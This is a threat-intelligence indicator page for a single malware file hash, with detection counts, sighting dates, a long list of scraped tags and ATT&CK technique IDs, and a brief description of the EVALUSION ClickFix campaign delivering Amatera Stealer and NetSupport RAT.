IOC Radar
SHA256MediumSignal 84/100

a61a2efaad92e5888cf20cb2bf96b9874eac5d5aadf6456c76926ab90cbe74d7

Location
PeruPeru
First Seen
Nov 14, 2025
Last Seen
May 25, 2026
Nov 14
First Seen
214d ago
May 25
Last Seen
22d ago
7
Reports
source reports
84%
Confidence
medium
60/76
VirusTotal
detections
Found in 7 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
SHA-256 Hash
SHA-256 file hash — primary identifier for malware samples.
MISP Category
Artifacts Dropped
Hash Algorithm
SHA256
Confidence
84%
Signal Score
84 / 100
IDS Rule
No
Threat Context
Tags
MITRE ATT&CK

MITRE ATT&CK TTPs

44 techniques

Feed Intelligence Summary

7 reports84% confidence
7
Source reports
84%
Confidence score
Category tags
abuseacracr stealeractive scanamadeyamateraamatera stealeramigoamsi bypassamsiscanbufferanydeskappdataapt activitybad reputationbrowser databrute forcebypassc++ malwarec2 communicationcisa kevcommand & controlcommand and controlcommand executioncredential accesscredential harvestingcredential stealingcredential stuffingcredential theftcryptercrypter payloadcrypto walletscrypto-walletscryptocurrencycryptocurrency threatscryptojackingcyberdata exfiltrationdata store exposuredetect-debug-environmentdragonforceevalusion campaignevasionevasion techniquesexeexecutable fileexploit availableexploitation activityfilefile-hashfinancegoogle chromehuntersidentity & access exploitationin the wildindicatorinformation stealerinformation stealing malwareinformation theftinfostealerinjection activityjsonmalmalicious powershell activitymalwaremalware campaignmalware deliverymalware deployment campaignmalware distributionmalware-as-a-servicemanagermanager zipmobile threatnetsupport ratngate android malwareoperating systempayload deliverypeexeperuphatom ravenphishingphishing attackprocess injectionransomwareratremote accessremote access trojanremote servicesresearchedresource hijackingrun promptscripting attackssheldiosneaky malwaresocial engineeringsouth americastealerstealer c2t1003t1005t1020t1021t1021.001t1027t1041t1053.005t1055t1056.001t1059t1059.001t1059.003t1069.001t1071t1071.001t1078t1078.002t1082t1083t1086t1105t1106t1119t1132.001t1140t1185t1204t1204.002t1218.005t1219t1486t1496t1497t1547.001t1553.002t1555t1560t1566t1566.001t1566.002t1566.003t1573.001t1573.002threat actorthreat responsetor nodeunitvidarvulnerability scanwalletwin32 malwarewindows malwarexloader

Activity Timeline

1 total obs
May 25May 25

Threat Activity Heatmap

· Peak: 2026-05-25
Less
More
Mon
Wed
Fri
Jun
·
·
Jul
·
·
·
Aug
·
·
·
Sep
·
·
·
·
Oct
·
·
·
Nov
·
·
·
Dec
·
·
·
·
Jan
·
·
·
Feb
·
·
·
Mar
·
·
·
·
Apr
·
·
·
May
·
·
·
Jun
·
24h
0
Dormant
7d
0
Dormant
30d
1
Minimal
3mo
1
Minimal
Threat ScoreHigh Risk
84
SIGNAL
Signal Score
84%
Confidence
7
Reports
First seenNov 14, 2025
Last seenMay 25, 2026

VirusTotal

60/ 76vendors flagged
79% detection rateJun 9, 2026

WHOIS

description
In November 2025, the EVALUSION campaign was identified as using ClickFix to gain initial access to systems and deploy two key pieces of malware: Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded variant of ACR (AcridRain) Stealer, which was previously marketed as Malware-as-a-Service by a threat actor identified as SheldIO until its source code was sold in 2024. The analysis indicates that attackers typically exploit social engineering techniques through ClickFix to manipulate victims into executing malicious commands via the Windows Run Prompt, facilitating the subsequent deployment of Amatera and, later, the NetSupport Manager RAT-a legitimate remote management tool often abused for unauthorized remote access.

Export & API

STIX 2.1 Bundle
CSV Export
Permalink

IOC Journey

medium
First detected 7 months ago · Last seen 22 days ago
Appeared in 7 threat reports